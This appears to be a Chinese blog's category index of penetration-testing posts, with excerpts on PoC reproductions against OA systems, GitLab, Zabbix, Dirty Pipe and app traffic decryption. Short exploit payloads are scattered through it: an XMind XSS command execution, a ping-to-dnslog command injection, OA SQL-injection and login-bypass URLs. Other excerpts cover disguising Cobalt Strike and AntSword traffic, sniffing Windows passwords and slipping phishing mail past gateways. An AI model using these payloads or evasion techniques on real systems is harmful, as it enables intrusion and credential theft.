![](https://img-blog.csdnimg.cn/20201014180756918.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
文章平均质量分 70
Adminxe
Adminxe:网络无安全,攻防无绝对!
“Network attack and defense no safety, no absolute!”
持续关注网络安全,博客文章不断更新!
“Continuous attention to network security, constantly updated blog articles!”
展开
-
【保姆级教学】某金融app FRIDA hook加解密算法+jsrpc=乱杀
注意:抓取https的包需要安装证书,需要注意的是,安卓7.0以下,系统信任用户安装的证书,而安卓7.0以上,系统不会信任用户安装的证书,导致无法抓取https的包,建议使用magisk+Move Certificates将证书移动到系统路径下。通过抓包,发现请求包和返回包都被加密了,但是通过观察多个请求包会发现请求体的内容都是以“#01开头”,而这正是突破口,我们可以通过反编译代码,全局搜索“#01”,来寻找加密的地方。加固的话,也是有对策的,可以使用脱壳机脱壳,使用hluda绕过frida检测。原创 2023-03-16 19:37:00 · 3500 阅读 · 1 评论 -
某金融app的加解密hook+rpc+绕过SSLPinning抓包
charles抓包的时候app显示无法连接到服务器,charles提示证书的问题,怀疑可能是SSLPinning,使用抓包工具抓包时,抓包工具拦截了服务端返回的内容并重新发给客户端的时候的证书不是服务器端原来的证书了,抓包工具将原本服务器的证书替换成自己的证书,于是就构成了中间人攻击,触发SSL Pinning导致连接中断,所以就抓不到包了。console.log("==========================解密算法==============================");原创 2023-03-07 23:55:05 · 3408 阅读 · 1 评论 -
文件上传绕过的一次思路总结学习
我是来总结的,嘀嘀嘀开车了!!!0x00 测试上传正常文件这里可以判定文件名虽然是重命名,但是可控的,因为我们上传的文件名被带进去了(_1.txt)这里利用的思路主要:1.目录没有执行权限(通过控制文件名进行../../跳目录,跳到可以执行脚本语言的目录)2.上传文件找不到路径(通过控制文件名进行../../跳目录,层级跳到根目录进行访问)3.上传白名单截断 (有些文件上传处是白名单,后缀名不可以绕,可以利用控制文件名截断的方式去绕过白名单,例如1.jsp%00.jpg)原创 2022-06-21 02:15:49 · 1502 阅读 · 0 评论 -
记一次睡梦中某核酸检测系统的渗透测试
0x00 前言初来某单位,领导直接丢了一手某省的核酸检测系统让我们进行测试,并且说这是一个单系统的攻防演练的,还有分数竞赛,直接拿起锄头开始干。0x01 信息探测站点打开,除了几张图片,就是一个登录框,简单画图画一下:基本就是这个样子,没有其他功能点,抓包看下详情,shiro框架,试了下没有shiro反序列化漏洞,也没有其他功能点,扫目录什么都扫不到,看他其他端口都没有业务,开始陷入了沉思基本就是这个情况,shiro漏洞不存在,爆破也尝试了,加密很严格,拉取crypto.js..原创 2022-04-26 12:33:53 · 1899 阅读 · 9 评论 -
Dirty Pipe – Linux 内核本地提权漏洞
一、漏洞简介CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。二、影响范围5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102原创 2022-03-08 21:51:03 · 6190 阅读 · 1 评论 -
Zabbix SAML SSO 登录绕过漏洞
一、简介zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix server可以通过SNMP,zabbix agent,ping,端口监视等方法提供对远程服务器/网络状态的监视,数据收集等功能,它可以运行在Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X等平台上。该漏洞源于在启用s.原创 2022-03-02 13:23:18 · 4936 阅读 · 0 评论 -
记一次攻防演练复盘之计中计
0x00 前言这两天听DR复盘,补充了很多小技能点,真的要非常细心呀,然后下面就是正文了。领导通知,让我打十天攻防,前四天,平平无奇,两个权限,web系统都是外包的,没打进核心内网。这次攻防,没有给靶标,也没有给资产,全靠自己进行信息搜集。0x01 前期信息搜集信息搜集主要以厂商系统为主,通过使用fofa,云悉,查ICP备案,APP脱壳逆向,公众号接口,小程序,天眼查查母公司以及子公司的备案和资产信息。通过能直接获取到的资产信息,进行二次信息搜集,主要是以C段,B段和目录扫描为主。..原创 2021-11-01 22:55:08 · 906 阅读 · 1 评论 -
【漏洞复现】CVE-2021-22205 GitLab 未授权RCE
0x00 漏洞简介:漏洞出来第一时间,听漏洞浍测的朋友传来的情报,就及时给了POC,但一直没复现,只是简单看了文章,提到需要可以注册用户才能进行攻击,然后就感觉挺鸡肋,没有再继续看。恰巧好基友涛子给我发来他复现的文章,看了看exp,感觉并没那么鸡肋,相反可以通过未授权进行权限的获取,正好自己也复现了一手,同时借用涛子的文章给大家展现了出来。GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。GitLab是一款Ruby开发的G..原创 2021-10-31 19:51:42 · 968 阅读 · 0 评论 -
针对Ueditor不出网getshell的解决方法
刚才转csdn,发现az写了一个关于Ueditor不出网问题的解决问题,思路非常不错,相当于组合拳形式,然后我来做个总结:1、针对于不出网问题,可以使用127.0.0.1或者localhost进行绕过,当然绕过的前提是通过ueditor编辑器上传一张图片马,记住哈,一定要用被攻击站点的编辑器进行上传,然后获取到图片马的地址;2、第二点需要主义的就是127.0.0.1或者localhost对外开放的端口问题,利用伪协议探测端口或者强大的信息收集能力获取内网ip及端口,从而找到出口地方还是.原创 2021-09-18 19:26:35 · 761 阅读 · 0 评论 -
关于前端加密登陆绕过的渗透思路
0x00 前端加密好就不发博客了,今天主要讲一下前端加密绕过。前端加密,判断加密类型,根据加密类型,找到对应解密形式,同时如果存在简单前端校验时,比如js绕过,base64编码,这样的话就会简单很多,但对于AES加密时,我们就首先要熟悉AES的加密规则。0x01 关于AES加密规则https://www.cnblogs.com/starwolf/p/3365834.html附上链接,AES五种加密模式(CBC、ECB、CTR、OCF、CFB)。c++源码:/***@param..原创 2021-08-22 12:31:46 · 1960 阅读 · 6 评论 -
若依(Ruoyi)管理系统后台sql注入+任意文件下载漏洞
0x00若依介绍若依可以用于所有的Web应用程序,如网站管理后台,网站会员中心,CMS,CRM,OA。所有前端后台代码封装过后十分精简易上手,出错概率低。同时支持移动客户端访问。系统会陆续更新一些实用功能。寓意:你若不离不弃,我必生死相依0x01漏洞描述若依管理系统是基于SpringBoot的权限管理系统,后台存在sql注入、任意文件下载漏洞,可以读取数据库、服务器上的任意文件内容。0x02FOFAapp=”若依-管理系统”0x03漏洞复现SQL注入这是个..原创 2021-08-03 10:58:15 · 7157 阅读 · 3 评论 -
H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞
0x00 前言H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令,漏洞类似于齐治堡垒机0x01 影响范围H3C SecParh堡垒机0x02 漏洞复现先通过任意用户登录获取Cookie/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(1..原创 2021-07-02 09:18:55 · 846 阅读 · 0 评论 -
记某hw中遇到的cms(PageAdmin CMS)渗透过程
0x00前言这是上周hw中遇到的一个cms,记录一下,防止以后遇到忘记利用点(手动狗头)0x01介绍PageAdmin Cms是一款基于asp.net mvc开发的自助建站系统,于2008年发布,从最开始的2.0版本到目前的4.0版本,强大的后台管理功能,良好的用户操作体验,开发式的功能扩展,让各种类型网站制作更加便捷和灵活。0x02开搞!!!网页内容太多,全码了往下滑,一般会底部写着PageAdmin cms直接+一手master看是不是常规后台..原创 2021-07-02 09:17:30 · 883 阅读 · 0 评论 -
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
0x00 漏洞描述用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell0x01 漏洞影响用友 NC0x02 FOFA“用友网络”0x03 漏洞复现漏洞位置/servlet/~ic/bsh.servlet.BshServlet将POC修改为:exec(“whoami”)0x04 利用总..原创 2021-07-02 09:15:45 · 5312 阅读 · 0 评论 -
【漏洞复现】蓝凌OA近期公开几个漏洞汇总
0x00 蓝凌OA custom.jsp 任意文件读取漏洞1、app=”Landray-OA系统”2、漏洞复现出现漏洞的文件为 custom.jsp<%@page import="com.landray.kmss.util.ResourceUtil"%><%@page import="net.sf.json.JSONArray"%><%@page import="net.sf.json.JSONObject"%><%@ page lang..原创 2021-07-02 09:13:47 · 5247 阅读 · 8 评论 -
拯救被钓鱼的小姐姐们(某钓鱼网站渗透过程)
0x00前言本来打算打王者来着,大哥突然收到一封邮件,标题为某学校2021学生总成绩单啥的,好家伙钓鱼钓到大哥头上了,勇敢牛牛,不怕困难,日他!!!0x01开日!!!哦吼,直接扫码看域名http://xx.xxx.xx/app/app2/index.php?user=xxx&ta=xxx&=xxx谢谢,有被low到,废话不多说御剑开扫。?拿捏,直接进后台找利用点。弱口令打一波,抓包测一下,看看是否可以修改响应包,之后搞一下注入。前两种方..原创 2021-06-28 08:54:43 · 837 阅读 · 3 评论 -
XMind-XSS-V8内核命令执行复现
0x00 前言测试环境:XMind 2020050821280x01 payload(需要在大纲板块进行触发)<img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">0x02 触发键shift control option command0x03 漏..原创 2021-05-11 10:59:56 · 226 阅读 · 0 评论 -
Zeppelin未授权访问getshell
0x00 前言Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等。0x01 漏洞复现主要是未授权带来了命令执行漏洞,直接干货..原创 2021-03-20 16:02:11 · 803 阅读 · 0 评论 -
【漏洞复现】锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(CNVD-2021-14536)
0x00 前言2021年3月8日,锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证信息泄露。这个漏洞让我想到10年的审查元素大法,确实逻辑有点……0x01 影响范围锐捷RG-UAC统一上网行为管理审计系统FOFA互联网资产:title="RG-UAC登录页面"0x02 漏洞复现Ctrl+U打开网页源代码通过访问一下路径,查看所包含的账户密码的(md5)形式http://127..原创 2021-03-09 15:24:16 · 3492 阅读 · 0 评论 -
【漏洞复现】通达OA v11.7 在线任意用户登录漏洞
0x00 前言通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断。具体fofa语法放在下面:app="TDXK-通达OA"0x01 在线用户判断访问 :http://xxx.xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0如果页面时空白的,则说明管理员在线,即可以利用如果显示RELOGIN,则不...原创 2021-03-08 17:45:20 · 7027 阅读 · 2 评论 -
【漏洞复现】Vmware vcenter未授权任意文件RCE
0x00 Vmware vcenter信息vSphere是VMware推出的虚拟化平台套件,包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为ESXi的控制中心,可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机,使得IT管理员能够提高控制能力,简化入场任务,并降低IT环境的管理复杂性与成本。vSphere Client(HTML5)在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向...原创 2021-02-28 23:32:15 · 1247 阅读 · 0 评论 -
【漏洞复现】Apache Druid 远程代码执行 CVE-2021-25646
0x00 前言这个漏洞的根本问题是一个druid中全局性的问题,开发者在使用Jackson相关的标签时,出现疏漏,使得攻击者可以构造传入的json串来控制一些敏感的参数。阿里云安全@Litch1向Apache官方报告了Apache Druid远程代码执行漏洞当时 漏洞 已知,处于某些原因,提取的poc也没进行公布,今天醒来,看到很多公众号发 ,也就总结一下,集各家所长,写一个复现的文章。Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据...原创 2021-02-03 13:53:20 · 451 阅读 · 1 评论 -
Apache Axis2 后台文件上传getshell 漏洞复现
0x00 前言Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本。事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质..原创 2021-01-06 13:07:17 · 2115 阅读 · 1 评论 -
SSTI( 服务器模板注入)以及常见利用方式
0x00 前言简单介绍下,由于模板引擎支持使用静态模板文件,并在运行时用HTML页面中的实际值替换变量/占位符,从而让HTML页面的设计变得更容易。当前广为人知且广泛应用的模板引擎有Smarty、Twig、Jinja2、FreeMarker和Velocity。简而言之,我们如果在开发过程中,如果选择使用的字符串格式化将URL动态添加到模板字符串中并返回到页面中,这时用户对模板是可控的。0x01 漏洞演示根据清风师傅在文章中所提到的,我们原版来分析下:针对于模板可控,带入触发X..原创 2020-11-20 16:58:24 · 1033 阅读 · 1 评论 -
解决 Ant Sword-HTTPS 证书失效(cert_has_expired)连不上问题
0x00 前言渗透过程中,有的时候会遇到,上传小马,使用蚁剑连接会提示报错(code:cert_has_expired)问题,并且上传大马能正常解析,或者使用菜刀可以连接上,但是蚁剑和冰蝎就是连接不上,这时候就出现了这篇文章。0x01 相关信息Windows 10jdk1.8.0_144尝试1:默认在中国蚁剑里面有忽略 https 证书的选项, 测试失败尝试2:在 执行 jar 时加入参数-Djsse.enableSNIExtension=false , 忽略证书菜刀..原创 2020-09-23 02:48:09 · 8199 阅读 · 3 评论 -
通达OA 11.2后台getshell漏洞复现
0x00 漏洞描述通达OA 11.2“组织”-》”管理员”-》附件上传处存在任意文件上传漏洞,结合“系统管理”-》”附件管理”-》”添加存储目录”,修改附件上传后保存的路径,最终导致getshell0x01 漏洞影响版本通达OA 11.20x02 漏洞复现1、下载https://cdndown.tongda2000.com/oa/2019/TDOA11.2.exe,windows下直接点击安装,管理用户admin,密码为空2、使用admin,密码为空登录,点击”系统管理”...原创 2020-09-23 02:46:20 · 929 阅读 · 0 评论 -
通达OA 任意文件上传+文件包含导致RCE
0x00 漏洞描述ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell0x01 漏洞影响版本通达OA V11版 <= 11.3 20200103 通达OA 2017版 <= 10.19 20190522 通达OA 2016版 <= 9.13 20170710 通达OA 2015版 <= 8.1...原创 2020-09-23 02:45:05 · 1335 阅读 · 0 评论 -
通达OA 11.7 后台sql注入getshell漏洞复现
0x00 漏洞描述通达OA 11.7存在sql注入0x01 漏洞影响版本通达oa 11.7利用条件:需要账号登录0x02 漏洞复现1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装2、condition_cascade参数存在布尔盲注POC:GET /general/hr/manage/query/delete_cascade.php?condition_cascade=se...原创 2020-09-23 02:44:01 · 1613 阅读 · 0 评论 -
通达OA 11.5 SQL注入漏洞复现
0x00 漏洞描述通达OA 11.5存在sql注入0x01 漏洞影响版本通达oa 11.50x02 漏洞复现1、下载通达OA 11.5https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe,点击安装2、创建一个普通账户test:test1234563.1、id参数存在sql注入利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入参数位置:/general/appbuilder/web/...原创 2020-09-23 02:42:04 · 2122 阅读 · 0 评论 -
ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现
0x00 简介ThinkAdmin是基于 ThinkPHP 的微信后台管理平台0x01 影响版本ThinkAdminV60x02 漏洞复现POC:POST /admin.html?s=admin/api.Update/node HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: te..原创 2020-09-23 02:40:04 · 947 阅读 · 0 评论 -
泛微OA云桥 未授权任意文件读取
0x00 漏洞描述泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。0x01 影响版本2018-2019 多个版本。0x02 漏洞复现第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串..原创 2020-09-23 02:37:58 · 1595 阅读 · 0 评论 -
天融信TopApp-LB 负载均衡系统漏洞总结
0x00 漏洞描述1、天融信负载均衡TopApp-LB系统无需密码直接登陆2、天融信TopApp-LB负载均衡命令执行漏洞3、天融信TopApp-LB 负载均衡系统Sql注入漏洞0x01 漏洞复现1、使用poc::用户名随意 密码:;id2、使用poc:; ping xxx.dnslog.info; echo3.1、抓包3.2、vid参数加单引号,报错3.3、使用or 1=1 or 1=2发现返回界面不一样,证明存在注入点(布尔盲注)...原创 2020-09-23 02:36:08 · 1280 阅读 · 0 评论 -
通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现
0x00 简介通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。今天看了好多通达OA的文章,根据护网中出现的一些0day,进行一波分析,其中感觉9hu大佬分析的很到位,然后来以此为基准,一起来看一下这个影响较深的漏洞。然后我自己感觉,出现的漏洞只是表面的一些,其中还有肯定是未公布的,包括我之前在别的版本审..原创 2020-09-22 15:52:42 · 1534 阅读 · 0 评论 -
蚁剑特征性信息修改简单过WAF
0x00 前言针对于蚁剑的特征,对于流量传输中WAF检测的绕过, 打造武器库, 进行合理化的修改,例如请求头的伪造,流量的加密等一些常用功能,这边主要进行 这几部分的修改。0x01 修改位置蚁剑代理通道 UA特征伪造 RSA流量加密0x02 具体操作1.蚁剑代理通道蚁剑代理通道设置(前提是必须有这个代理):2.UA特征伪造蚁剑默认UA抓包:主要修改的位置:/modules/request.js这边主要是推荐百度UA,具体自己可以百度下其他UA,都可..原创 2020-09-21 23:13:44 · 860 阅读 · 0 评论 -
Cobalt Strike特征性信息修改玩转防火墙设备
0x00 前言Cobalt Strike 服务端和客户端是通过 SSL 加密通讯的,由于SSL配置文件和代理配置文件由于默认配置导致keystore文件内容通常被用于防火墙识别。后渗透中经常使用到CS,从两方面讲:一方面是内网设备对流量的管控十分严格,如果不对CS特征进行修改,很容易就被内网设备抓到,进行溯源或者直接封掉IP,间接凉西皮;另外一方面主要还是为了保证攻击队队员计算机的安全,防止被攻击队反制,前段时间看到大佬写的反制CS低版本尤为吊,所以呢,为了防止凉犊子,改了最好。不然的话,你有你..原创 2020-09-13 21:34:16 · 2068 阅读 · 0 评论 -
phpstudy_pro小皮最新版本nginx 默认存在任意文件解析漏洞
0x00 前言先给小皮介绍下:phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。我记得我可爱的Taoing在前段时间给我说过这个洞,因为是小皮(phpstudy_pro)默认自带的测试版本,也就是nginx 1.15.11 ,所以说如果用小皮搭建的系统,不变化ngin...原创 2020-09-03 10:50:53 · 967 阅读 · 0 评论 -
深信服 EDR终端检测响应平台 0day RCE 漏洞
0x01 前言昨天睡得正香,突然公司售前就呼来电话,问某某edr出现啥问题了,然后我就给他讲了一遍,这个月太忙了,没时间写博客,今天继续来水一篇。其次大哥来波最真挚的简介:深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统...原创 2020-08-18 17:32:54 · 6911 阅读 · 0 评论 -
利用系统函数获取Windows明文密码
0x01 前言前段时间,根据大佬Grzegorz Tworek发布的 :使用LanMan版本的NPLogonNotify()函数来嗅探用于登录Windows的每个密码。明文。无需重新启动。今天过来研究一波,同时借鉴 来自鸿鹄 ly大佬写的集成powershell调用,来进一步方便利用。0x02 原理通过修改注册表,借助系统函数,抓取Windows明文密码0x03 复现然后将下列代码编译为dll文件:NPPSPy.c源代码#include <Windows.h...原创 2020-07-22 18:13:04 · 680 阅读 · 1 评论 -
钓鱼邮件积分制
0x01 前言今天无聊看帖子,发现“ 查鲁特 ”师傅发表的钓鱼邮件积分制特别有趣,很形象的应用于攻防演练的场景,对抗于邮件网关是非常重要的一件事,所以拿来分享一下,重视规则,才能突破规则。0x02 积分策略很形象的一个话题,使用积分制来决定你的落户准则,没办法,弱者自然被淘汰,只有不断增长积分才能不被留存在垃圾箱,转而进入收件箱:邮件的防护策略就像上海落户一样,当无法进收件箱就跟落户积分不够一样,要想进收件箱必要让自己分值更高。邮件防护策略分为三种关系如下:拒收<垃圾箱<..原创 2020-07-18 14:14:19 · 391 阅读 · 0 评论 -
Joomla-3.4.6远程代码执行漏洞利用与分析
0x01 Joomla简介Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩充使用范围。目前最新版本3.9.11,Joomla!是一套自由的开源软件,使用GPL授权,任何人随时都能下载 Joomla! 并使用。0x02 漏洞简介在exploit-db(https://www.exploit-db.com/exploits/47465)发布了Joomla命令执行...原创 2020-07-16 11:11:51 · 1379 阅读 · 0 评论